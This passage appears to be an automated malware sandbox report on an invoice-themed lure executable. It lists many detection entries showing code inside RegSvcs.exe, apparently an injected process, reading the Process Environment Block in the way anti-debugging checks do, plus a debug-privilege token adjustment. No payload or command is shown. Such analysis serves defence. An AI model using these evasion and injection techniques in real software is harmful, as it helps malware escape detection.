            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3734880831.000000000114F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_014F4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014703E9 mov eax, dword ptr fs:[00000030h]4_2_014703E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014963FF mov eax, dword ptr fs:[00000030h]4_2_014963FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E3F0 mov eax, dword ptr fs:[00000030h]4_2_0147E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E3F0 mov eax, dword ptr fs:[00000030h]4_2_0147E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E3F0 mov eax, dword ptr fs:[00000030h]4_2_0147E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148438F mov eax, dword ptr fs:[00000030h]4_2_0148438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148438F mov eax, dword ptr fs:[00000030h]4_2_0148438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E388 mov eax, dword ptr fs:[00000030h]4_2_0145E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E388 mov eax, dword ptr fs:[00000030h]4_2_0145E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E388 mov eax, dword ptr fs:[00000030h]4_2_0145E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458397 mov eax, dword ptr fs:[00000030h]4_2_01458397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458397 mov eax, dword ptr fs:[00000030h]4_2_01458397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458397 mov eax, dword ptr fs:[00000030h]4_2_01458397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151A250 mov eax, dword ptr fs:[00000030h]4_2_0151A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151A250 mov eax, dword ptr fs:[00000030h]4_2_0151A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E8243 mov eax, dword ptr fs:[00000030h]4_2_014E8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E8243 mov ecx, dword ptr fs:[00000030h]4_2_014E8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0153625D mov eax, dword ptr fs:[00000030h]4_2_0153625D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145A250 mov eax, dword ptr fs:[00000030h]4_2_0145A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466259 mov eax, dword ptr fs:[00000030h]4_2_01466259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01510274 mov eax, dword ptr fs:[00000030h]4_2_01510274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464260 mov eax, dword ptr fs:[00000030h]4_2_01464260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464260 mov eax, dword ptr fs:[00000030h]4_2_01464260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464260 mov eax, dword ptr fs:[00000030h]4_2_01464260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145826B mov eax, dword ptr fs:[00000030h]4_2_0145826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145823B mov eax, dword ptr fs:[00000030h]4_2_0145823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A2C3 mov eax, dword ptr fs:[00000030h]4_2_0146A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015362D6 mov eax, dword ptr fs:[00000030h]4_2_015362D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702E1 mov eax, dword ptr fs:[00000030h]4_2_014702E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702E1 mov eax, dword ptr fs:[00000030h]4_2_014702E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702E1 mov eax, dword ptr fs:[00000030h]4_2_014702E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E0283 mov eax, dword ptr fs:[00000030h]4_2_014E0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E0283 mov eax, dword ptr fs:[00000030h]4_2_014E0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E0283 mov eax, dword ptr fs:[00000030h]4_2_014E0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E284 mov eax, dword ptr fs:[00000030h]4_2_0149E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E284 mov eax, dword ptr fs:[00000030h]4_2_0149E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702A0 mov eax, dword ptr fs:[00000030h]4_2_014702A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014702A0 mov eax, dword ptr fs:[00000030h]4_2_014702A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov ecx, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F62A0 mov eax, dword ptr fs:[00000030h]4_2_014F62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468550 mov eax, dword ptr fs:[00000030h]4_2_01468550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468550 mov eax, dword ptr fs:[00000030h]4_2_01468550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149656A mov eax, dword ptr fs:[00000030h]4_2_0149656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149656A mov eax, dword ptr fs:[00000030h]4_2_0149656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149656A mov eax, dword ptr fs:[00000030h]4_2_0149656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F6500 mov eax, dword ptr fs:[00000030h]4_2_014F6500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534500 mov eax, dword ptr fs:[00000030h]4_2_01534500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470535 mov eax, dword ptr fs:[00000030h]4_2_01470535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E5CF mov eax, dword ptr fs:[00000030h]4_2_0149E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E5CF mov eax, dword ptr fs:[00000030h]4_2_0149E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014665D0 mov eax, dword ptr fs:[00000030h]4_2_014665D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A5D0 mov eax, dword ptr fs:[00000030h]4_2_0149A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A5D0 mov eax, dword ptr fs:[00000030h]4_2_0149A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C5ED mov eax, dword ptr fs:[00000030h]4_2_0149C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C5ED mov eax, dword ptr fs:[00000030h]4_2_0149C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014625E0 mov eax, dword ptr fs:[00000030h]4_2_014625E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01494588 mov eax, dword ptr fs:[00000030h]4_2_01494588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01462582 mov eax, dword ptr fs:[00000030h]4_2_01462582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01462582 mov ecx, dword ptr fs:[00000030h]4_2_01462582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E59C mov eax, dword ptr fs:[00000030h]4_2_0149E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E05A7 mov eax, dword ptr fs:[00000030h]4_2_014E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E05A7 mov eax, dword ptr fs:[00000030h]4_2_014E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E05A7 mov eax, dword ptr fs:[00000030h]4_2_014E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014845B1 mov eax, dword ptr fs:[00000030h]4_2_014845B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014845B1 mov eax, dword ptr fs:[00000030h]4_2_014845B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151A456 mov eax, dword ptr fs:[00000030h]4_2_0151A456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148245A mov eax, dword ptr fs:[00000030h]4_2_0148245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145645D mov eax, dword ptr fs:[00000030h]4_2_0145645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EC460 mov ecx, dword ptr fs:[00000030h]4_2_014EC460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148A470 mov eax, dword ptr fs:[00000030h]4_2_0148A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148A470 mov eax, dword ptr fs:[00000030h]4_2_0148A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148A470 mov eax, dword ptr fs:[00000030h]4_2_0148A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01498402 mov eax, dword ptr fs:[00000030h]4_2_01498402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01498402 mov eax, dword ptr fs:[00000030h]4_2_01498402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01498402 mov eax, dword ptr fs:[00000030h]4_2_01498402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145C427 mov eax, dword ptr fs:[00000030h]4_2_0145C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E420 mov eax, dword ptr fs:[00000030h]4_2_0145E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E420 mov eax, dword ptr fs:[00000030h]4_2_0145E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E420 mov eax, dword ptr fs:[00000030h]4_2_0145E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A430 mov eax, dword ptr fs:[00000030h]4_2_0149A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014604E5 mov ecx, dword ptr fs:[00000030h]4_2_014604E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151A49A mov eax, dword ptr fs:[00000030h]4_2_0151A49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014664AB mov eax, dword ptr fs:[00000030h]4_2_014664AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014944B0 mov ecx, dword ptr fs:[00000030h]4_2_014944B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EA4B0 mov eax, dword ptr fs:[00000030h]4_2_014EA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149674D mov esi, dword ptr fs:[00000030h]4_2_0149674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149674D mov eax, dword ptr fs:[00000030h]4_2_0149674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149674D mov eax, dword ptr fs:[00000030h]4_2_0149674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EE75D mov eax, dword ptr fs:[00000030h]4_2_014EE75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460750 mov eax, dword ptr fs:[00000030h]4_2_01460750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2750 mov eax, dword ptr fs:[00000030h]4_2_014A2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2750 mov eax, dword ptr fs:[00000030h]4_2_014A2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E4755 mov eax, dword ptr fs:[00000030h]4_2_014E4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468770 mov eax, dword ptr fs:[00000030h]4_2_01468770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C700 mov eax, dword ptr fs:[00000030h]4_2_0149C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460710 mov eax, dword ptr fs:[00000030h]4_2_01460710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01490710 mov eax, dword ptr fs:[00000030h]4_2_01490710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C720 mov eax, dword ptr fs:[00000030h]4_2_0149C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C720 mov eax, dword ptr fs:[00000030h]4_2_0149C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149273C mov eax, dword ptr fs:[00000030h]4_2_0149273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149273C mov ecx, dword ptr fs:[00000030h]4_2_0149273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149273C mov eax, dword ptr fs:[00000030h]4_2_0149273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DC730 mov eax, dword ptr fs:[00000030h]4_2_014DC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146C7C0 mov eax, dword ptr fs:[00000030h]4_2_0146C7C0
